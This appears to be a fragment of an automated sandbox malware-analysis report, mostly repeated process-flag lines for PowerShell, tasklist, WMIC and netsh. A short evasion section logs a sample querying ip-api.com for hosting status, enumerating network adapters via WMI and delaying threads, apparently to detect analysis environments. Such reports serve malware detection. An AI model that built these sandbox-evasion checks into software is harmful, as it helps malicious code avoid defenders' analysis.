                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
                    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
